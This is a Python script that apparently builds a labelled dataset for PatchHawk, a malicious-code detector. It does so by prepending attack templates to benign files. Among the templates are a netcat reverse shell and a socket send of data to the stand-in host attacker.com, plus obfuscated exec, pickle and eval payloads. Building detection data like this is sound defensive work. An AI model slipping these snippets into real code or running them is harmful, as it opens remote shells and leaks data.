Patch_Hawk / patchhawk /data /generate_scenarios.py
kanishcr7's picture
Final check:Passed
d6abea2
"""
Scenario generator for PatchHawk.
Track A: Meta synthetic-data-kit CLI (optional, graceful fallback).
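Track B: Custom mutation engine that injects attack templates into benign
Python files. Always runs; produces --num-samples scenarios (default 55).
Track HF: Optional import of snippets from a Hugging Face dataset
(--hf-dataset).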
Output: a single JSON file with fields:
id, type, code_snippet, patch (or null), unit_test_code,
label, source, attack_type
"""
import json
import os
import random
import subprocess
import tempfile
import uuid
from pathlib import Path
# ============================================================
# Attack Templates for Mutation Engine (Track B)
# ============================================================
# Ordered (attack name, injected source) pairs. Each snippet is meant to be
# prepended to a benign file and ends with a blank line so it stays separated
# from the code that follows it.
_ATTACK_SNIPPETS = (
    ("typosquatting", "import pythonn\n\n"),
    (
        "obfuscated_exec",
        "import base64\n"
        "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\n",
    ),
    (
        "env_hijack",
        "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\n",
    ),
    (
        "subprocess_backdoor",
        "import subprocess\n"
        "try:\n"
        " subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\n"
        "except:\n"
        " pass\n\n",
    ),
    (
        "eval_hidden",
        "def safe_eval(x):\n"
        " return eval(x)\n"
        'safe_eval(\'__import__("os").system("echo 1")\')\n\n',
    ),
    (
        "pickle_deserialization",
        "import pickle\n"
        "pickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\n",
    ),
    (
        "socket_exfil",
        "import socket\n"
        "try:\n"
        " s = socket.socket()\n"
        " s.connect(('attacker.com', 80))\n"
        " s.sendall(b'exfiltrated data')\n"
        "except:\n"
        " pass\n\n",
    ),
    (
        "malicious_import",
        "__import__('os').system('echo pwned > /tmp/pwned')\n\n",
    ),
)

# Public lookup: attack name -> {"inject": <source to prepend>, "patch": ""}.
# The "patch" entry is an empty string for every template.
ATTACK_TEMPLATES = {
    attack_name: {"inject": snippet, "patch": ""}
    for attack_name, snippet in _ATTACK_SNIPPETS
}
# ============================================================
# Benign file loader
# ============================================================
def load_benign_files(benign_dir: str) -> list:
    """Read every ``.py`` file located directly inside ``benign_dir``.

    Args:
        benign_dir: Directory that holds the benign Python samples.

    Returns:
        A list of ``{"filename": <name>, "code": <file contents>}`` dicts,
        ordered by filename. The list is empty when ``benign_dir`` does not
        exist or is not a directory.
    """
    # isdir (not exists): a path pointing at a regular file must produce an
    # empty result instead of crashing inside os.listdir.
    if not os.path.isdir(benign_dir):
        return []

    files_data = []
    for filename in sorted(os.listdir(benign_dir)):
        path = os.path.join(benign_dir, filename)
        # Ignore non-Python entries and directories that merely end in ".py".
        if not filename.endswith(".py") or not os.path.isfile(path):
            continue
        # Read as UTF-8 explicitly so the result does not depend on the
        # platform's locale encoding.
        with open(path, encoding="utf-8") as fh:
            files_data.append({"filename": filename, "code": fh.read()})
    return files_data
# ============================================================
# Auto-generated lightweight unit tests
# ============================================================
def auto_generate_unit_test(filename: str, code: str) -> str:
    """Build a minimal smoke test for a benign snippet.

    The returned test source always starts with ``import code``. If ``code``
    mentions one of a few known function names, a single assertion with a
    known-good result for that function follows; only the first name that
    matches (in table order) is used. Otherwise a trivially true assertion is
    emitted.

    Args:
        filename: Name of the benign file. Not consulted; kept so the call
            signature stays stable.
        code: Source text that is scanned for known function names.

    Returns:
        The generated test source as a string.
    """
    # Order matters: it reproduces the precedence of the name checks.
    known_checks = (
        ("fibonacci", "assert code.fibonacci(5) == 5\n"),
        ("factorial", "assert code.factorial(5) == 120\n"),
        ("is_prime", "assert code.is_prime(7) == True\n"),
        ("gcd", "assert code.gcd(48, 18) == 6\n"),
        ("is_palindrome", "assert code.is_palindrome('racecar') == True\n"),
        ("celsius_to_fahrenheit", "assert code.celsius_to_fahrenheit(0) == 32\n"),
    )
    fallback = "assert True # module loaded successfully\n"

    assertion = next(
        (line for needle, line in known_checks if needle in code),
        fallback,
    )
    return "import code\n" + assertion
# ============================================================
# Track B – custom mutation engine (always available)
# ============================================================
def generate_track_b_scenarios(benign_files: list, num_samples: int = 55) -> list:
    """Generate ``num_samples`` mutation-engine scenarios from benign files.

    The total is split into three groups:

    * true positives (``int(num_samples * 0.45)``): a random attack template
      is prepended to a random benign file; the untouched benign code is
      stored as the patch and the label is ``"malicious"``.
    * false positives (``int(num_samples * 0.27)``): a suspicious-looking
      but harmless snippet is prepended; label ``"benign"``, no patch.
    * functional (the remainder): the benign file unchanged; label
      ``"benign"``, no patch.

    Args:
        benign_files: Dicts with ``"filename"`` and ``"code"`` keys.
        num_samples: Total number of scenarios to produce.

    Returns:
        A list of scenario dicts. Empty when ``benign_files`` is empty or
        ``num_samples`` is not positive.
    """
    # random.choice raises IndexError on an empty sequence, so bail out early
    # when there is nothing to mutate (or nothing was requested).
    if not benign_files or num_samples <= 0:
        return []

    tp_count = int(num_samples * 0.45)
    fp_count = int(num_samples * 0.27)
    fn_count = num_samples - tp_count - fp_count

    scenarios = []

    def add_scenario(prefix, kind, snippet, patch, label, attack_type, benign):
        # Single place that fixes the field set and order of every scenario.
        scenarios.append(
            {
                "id": f"{prefix}_{uuid.uuid4().hex[:8]}",
                "type": kind,
                "code_snippet": snippet,
                "patch": patch,
                "unit_test_code": auto_generate_unit_test(
                    benign["filename"], benign["code"]
                ),
                "label": label,
                "source": "mutation_engine",
                "attack_type": attack_type,
            }
        )

    # ── True Positives (45%) ──────────────────────────────────
    # Materialize the choices once instead of on every iteration.
    attack_choices = list(ATTACK_TEMPLATES.items())
    for _ in range(tp_count):
        bf = random.choice(benign_files)
        attack_name, attack_data = random.choice(attack_choices)
        add_scenario(
            "tp",
            "true_positive",
            attack_data["inject"] + bf["code"],
            bf["code"],
            "malicious",
            attack_name,
            bf,
        )

    # ── False Positives (27%) ─────────────────────────────────
    # (name, snippet) pairs; the name only documents the snippet and is not
    # written to the output.
    fp_templates = [
        (
            "fp_eval",
            "def safe_calc(expr):\n"
            " # Legit eval in controlled env\n"
            " return eval(expr, {'__builtins__': {}}, {})\n\n",
        ),
        (
            "fp_requests",
            "import requests\n"
            "# Just checking internet\n"
            "try:\n"
            " requests.get('https://8.8.8.8', timeout=1)\n"
            "except:\n"
            " pass\n\n",
        ),
        (
            "fp_os_environ",
            "import os\n"
            "# Setup proxy\n"
            "os.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\n",
        ),
        (
            "fp_base64",
            "import base64\n"
            "def encode_msg(msg):\n"
            " return base64.b64encode(msg.encode())\n\n",
        ),
        (
            "fp_subprocess_legit",
            "import subprocess\n"
            "# Run a safe command for build process\n"
            "result = subprocess.run(['echo', 'build ok'], capture_output=True)\n\n",
        ),
    ]
    for _ in range(fp_count):
        bf = random.choice(benign_files)
        _fp_name, fp_code = random.choice(fp_templates)
        add_scenario(
            "fp", "false_positive", fp_code + bf["code"], None, "benign", None, bf
        )

    # ── Functional / Clean (remainder, ~28%) ──────────────────
    for _ in range(fn_count):
        bf = random.choice(benign_files)
        add_scenario("fn", "functional", bf["code"], None, "benign", None, bf)

    return scenarios
# ============================================================
# Track A – Meta synthetic-data-kit (optional)
# ============================================================
def generate_track_a_scenarios_with_sdk(output_dir: str, num_samples: int = 10) -> list:
    """Generate scenarios with Meta's ``synthetic-data-kit`` CLI (Track A).

    Runs the CLI steps ``ingest`` (only when a ``benign`` directory exists
    next to this file), ``create``, ``curate`` and ``save-as`` inside a
    temporary workspace, then converts the resulting JSON records into
    scenario dicts.

    Every failure mode is reported with a printed warning and results in the
    scenarios collected so far (usually an empty list) being returned:
    missing or unusable CLI, missing ``sdk_config.yaml``, a step timing out
    or exiting non-zero, or unreadable / malformed output.

    Args:
        output_dir: Currently unused; kept for interface compatibility.
        num_samples: Currently unused; kept for interface compatibility.

    Returns:
        A list of scenario dicts with ``"source": "synthetic_data_kit"``.
    """
    sdk_scenarios: list = []

    # Check CLI availability. OSError also covers a binary that exists but
    # cannot be executed (PermissionError), not just FileNotFoundError.
    try:
        subprocess.run(
            ["synthetic-data-kit", "--help"],
            capture_output=True,
            check=True,
        )
    except (subprocess.SubprocessError, OSError):
        print("⚠️ Meta synthetic-data-kit CLI not found. Track A disabled.")
        return sdk_scenarios

    data_dir = Path(__file__).parent
    config_path = data_dir / "sdk_config.yaml"
    if not config_path.exists():
        print(f"⚠️ SDK config not found at {config_path}. Track A disabled.")
        return sdk_scenarios

    with tempfile.TemporaryDirectory() as tmpdir:
        workspace = Path(tmpdir) / "sdk_workspace"
        workspace.mkdir()
        ingested = workspace / "ingested"
        created = workspace / "created"
        curated = workspace / "curated"
        output_json = workspace / "final_sdk.json"

        try:
            benign_dir = data_dir / "benign"
            if benign_dir.exists():
                _run_sdk_step("ingest", str(benign_dir), "--output", str(ingested))
            # Only the generation step carries a timeout, as before.
            _run_sdk_step(
                "create",
                str(ingested),
                "--type",
                "qa",
                "-c",
                str(config_path),
                "--output",
                str(created),
                timeout=600,
            )
            _run_sdk_step("curate", str(created), "--output", str(curated))
            _run_sdk_step(
                "save-as",
                str(curated),
                "--format",
                "json",
                "--output",
                str(output_json),
            )

            if output_json.exists():
                with open(output_json, encoding="utf-8") as fh:
                    data = json.load(fh)
                if isinstance(data, list):
                    for item in data:
                        scenario = _sdk_item_to_scenario(item)
                        if scenario is not None:
                            sdk_scenarios.append(scenario)
                else:
                    print("⚠️ Unexpected SDK output format (expected a JSON list).")
        except subprocess.TimeoutExpired:
            print("⚠️ SDK generation timed out.")
        except subprocess.CalledProcessError as e:
            # errors="replace": never let undecodable stderr mask the failure.
            msg = e.stderr.decode(errors="replace") if e.stderr else "Unknown error"
            print(f"⚠️ SDK command failed: {msg}")
        except (OSError, ValueError) as e:
            # json.JSONDecodeError is a ValueError subclass.
            print(f"⚠️ Could not read SDK output: {e}")

    return sdk_scenarios


def _run_sdk_step(*cli_args, timeout=None):
    """Run one ``synthetic-data-kit`` sub-command, raising on failure."""
    subprocess.run(
        ["synthetic-data-kit", *cli_args],
        check=True,
        capture_output=True,
        timeout=timeout,
    )


def _sdk_item_to_scenario(item):
    """Convert one SDK output record to a scenario dict, or None to skip it."""
    if not isinstance(item, dict):
        return None
    snippet = item.get("code_snippet") or item.get("code")
    # A record without any code cannot be used as a scenario.
    if not snippet:
        return None
    patch = item.get("patch")
    # A record counts as malicious exactly when it ships a non-empty patch.
    is_malicious = bool(patch)
    return {
        "id": f"tp_sdk_{uuid.uuid4().hex[:8]}",
        "type": "true_positive" if is_malicious else "functional",
        "code_snippet": snippet,
        "patch": patch,
        "unit_test_code": item.get("unit_test_code", "import code\nassert True"),
        "label": "malicious" if is_malicious else "benign",
        "source": "synthetic_data_kit",
        "attack_type": item.get("attack_type", "llm_generated"),
    }
# ============================================================
# Track HF – Hugging Face dataset loader (optional)
# ============================================================
def generate_track_hf_scenarios(
    hf_dataset_id: str,
    split: str = "train",
    text_field: str = "code",
    num_samples: int = 0,
    only_python: bool = False,
) -> list:
    """Load snippets from a Hugging Face dataset and return scenario dicts.

    ``hf_dataset_id`` may also be a local path: a directory (tried with
    ``load_from_disk`` first, then as a folder of ``*.jsonl`` files), a
    ``.jsonl`` / ``.json`` / ``.ndjson`` file, or any other file, which is
    read as plain text with one example per non-blank line.

    Args:
        hf_dataset_id: Hub dataset id (e.g. ``"username/repo"``) or local path.
        split: Split to load from the Hub. For local sources that yield
            several splits, this split is used when present, otherwise the
            first available one.
        text_field: Preferred field holding the code. A ``"chosen"`` field
            wins when present; ``"code"``, ``"snippet"`` and ``"text"`` are
            fallbacks.
        num_samples: ``0`` loads the whole split, otherwise only the first
            ``num_samples`` rows are considered.
        only_python: Skip rows whose ``lang`` / ``language`` field is set to
            something other than ``"python"``.

    Returns:
        A list of scenario dicts with ``"source": "huggingface_dataset"``.
        Empty when ``datasets`` is not importable or loading fails (a warning
        is printed in both cases).
    """
    hf_scenarios: list = []
    try:
        from datasets import load_dataset
    except Exception as e:
        print(f"⚠️ Install `datasets` (pip install datasets). Error: {e}")
        return hf_scenarios

    try:
        # If a local path is provided, prefer local loading.
        p = Path(hf_dataset_id)
        if p.exists():
            if p.is_dir():
                # Saved dataset directory created by `save_to_disk`.
                try:
                    from datasets import load_from_disk

                    ds = load_from_disk(str(p))
                except Exception:
                    # Fall back to loading the JSONL files inside the dir.
                    ds = load_dataset("json", data_files=str(p / "*.jsonl"))
            elif p.suffix.lower() in (".jsonl", ".json", ".ndjson"):
                ds = load_dataset("json", data_files=str(p))
            else:
                # Treat as plain text file, one example per line.
                with open(p, "r", encoding="utf-8") as fh:
                    lines = [line.rstrip("\n") for line in fh if line.strip()]
                from datasets import Dataset

                ds = Dataset.from_dict({"text": lines})
        else:
            ds = load_dataset(hf_dataset_id, split=split)

        # Loading without `split=` (and load_from_disk on a saved
        # DatasetDict) yields a mapping of split name -> dataset. Iterating
        # that mapping would produce split names instead of rows, so resolve
        # it to a single split first.
        if isinstance(ds, dict):
            if split in ds:
                ds = ds[split]
            elif ds:
                ds = next(iter(ds.values()))
            else:
                return hf_scenarios
    except Exception as e:
        print(f"⚠️ Could not load HF dataset {hf_dataset_id}: {e}")
        return hf_scenarios

    # Optionally limit to the first `num_samples` rows.
    try:
        total = len(ds)
    except Exception:
        total = None
    if num_samples and num_samples > 0 and total:
        try:
            ds = ds.select(range(min(num_samples, total)))
        except Exception:
            # Best effort: keep the full dataset if it cannot be sliced.
            pass

    default_test = "import code\nassert True"
    malicious_labels = ("malicious", "vuln", "vulnerable")
    candidate_fields = ("chosen", text_field, "code", "snippet", "text")

    for item in ds:
        unit_test = default_test
        if isinstance(item, dict):
            if only_python:
                lang = str(item.get("lang") or item.get("language") or "").lower()
                # Rows without a language tag are kept.
                if lang and lang != "python":
                    continue
            # First non-empty candidate field wins.
            code = next(
                (item[k] for k in candidate_fields if item.get(k)),
                None,
            )
            # `or` rather than a .get default: a column that exists but is
            # null for this row must still fall back to the default test.
            unit_test = item.get("unit_test_code") or default_test
            label = item.get("label") or item.get("classification") or "benign"
            patch = item.get("patch")
            attack_type = item.get("vulnerability") or item.get("attack_type")
        else:
            # Plain examples (no fields).
            code = str(item)
            label = "benign"
            patch = None
            attack_type = None

        if not code:
            continue

        # Malicious when a patch is supplied or the label says so.
        is_malicious = bool(patch) or (
            isinstance(label, str) and label.lower() in malicious_labels
        )
        hf_scenarios.append(
            {
                "id": f"hf_{uuid.uuid4().hex[:8]}",
                "type": "true_positive" if is_malicious else "functional",
                "code_snippet": code,
                "patch": patch,
                "unit_test_code": unit_test,
                "label": "malicious" if is_malicious else "benign",
                "source": "huggingface_dataset",
                "attack_type": attack_type,
            }
        )
    return hf_scenarios
# ============================================================
# CLI entry point
# ============================================================
def main(argv=None):
    """CLI entry point: build scenarios from the enabled tracks and save them.

    Track B (mutation engine) always runs. Track A (synthetic-data-kit) and
    the Hugging Face track are added when ``--use-sdk`` / ``--hf-dataset``
    are given. The combined list is shuffled and written as JSON to
    ``--output``; a short summary is printed. If no benign files are found
    the function prints a hint and returns without writing anything.

    Args:
        argv: Optional list of command-line arguments. ``None`` (the
            default) makes argparse read ``sys.argv[1:]``.
    """
    import argparse

    parser = argparse.ArgumentParser(description="Generate scenarios for PatchHawk")
    parser.add_argument(
        "--benign-dir",
        type=str,
        default="patchhawk/data/benign/",
    )
    parser.add_argument(
        "--output",
        type=str,
        default="patchhawk/data/scenarios.json",
    )
    parser.add_argument(
        "--num-samples",
        type=int,
        default=55,
        help="Number of scenarios to generate with Track B (mutation engine).",
    )
    parser.add_argument(
        "--use-sdk",
        action="store_true",
        help="Use Meta synthetic-data-kit (requires CLI + vLLM)",
    )
    parser.add_argument(
        "--sdk-samples",
        type=int,
        default=10,
        help="Number of SDK samples to generate",
    )
    parser.add_argument(
        "--hf-dataset",
        type=str,
        default=None,
        help="HuggingFace dataset id (e.g., username/repo) to import snippets from",
    )
    parser.add_argument(
        "--hf-split",
        type=str,
        default="train",
        help="Split name to load from the HF dataset",
    )
    parser.add_argument(
        "--hf-field",
        type=str,
        default="code",
        help="Field name in HF dataset that contains the code/snippet",
    )
    parser.add_argument(
        "--hf-samples",
        type=int,
        default=0,
        help="Number of HF samples to use (0 = all)",
    )
    parser.add_argument(
        "--hf-only-python",
        action="store_true",
        default=False,
        help="If set, only include HF examples where language/lang == python",
    )
    args = parser.parse_args(argv)

    benign_files = load_benign_files(args.benign_dir)
    if not benign_files:
        print(f"No benign files found in {args.benign_dir}. Create some first.")
        return

    # os.path.dirname is "" for a bare filename such as "scenarios.json".
    output_dir = os.path.dirname(args.output)

    # Track B (always)
    scenarios = generate_track_b_scenarios(benign_files, args.num_samples)

    # Track A (optional)
    if args.use_sdk:
        sdk = generate_track_a_scenarios_with_sdk(output_dir, args.sdk_samples)
        scenarios.extend(sdk)
        if sdk:
            print(f"Added {len(sdk)} SDK-generated scenarios.")

    # Track HF (optional)
    if args.hf_dataset:
        hf = generate_track_hf_scenarios(
            args.hf_dataset,
            args.hf_split,
            args.hf_field,
            args.hf_samples,
            args.hf_only_python,
        )
        scenarios.extend(hf)
        if hf:
            print(f"Added {len(hf)} HuggingFace scenarios.")

    random.shuffle(scenarios)

    # os.makedirs("") raises, so only create a directory when the output
    # path actually has a directory component.
    if output_dir:
        os.makedirs(output_dir, exist_ok=True)
    with open(args.output, "w", encoding="utf-8") as fh:
        json.dump(scenarios, fh, indent=2)

    tp = sum(1 for s in scenarios if s["label"] == "malicious")
    bn = sum(1 for s in scenarios if s["label"] == "benign")
    print(f"✅ Total scenarios: {len(scenarios)}")
    print(f" Malicious (TP): {tp}")
    print(f" Benign (FP+fn): {bn}")
    print(f" Saved to {args.output}")


if __name__ == "__main__":
    main()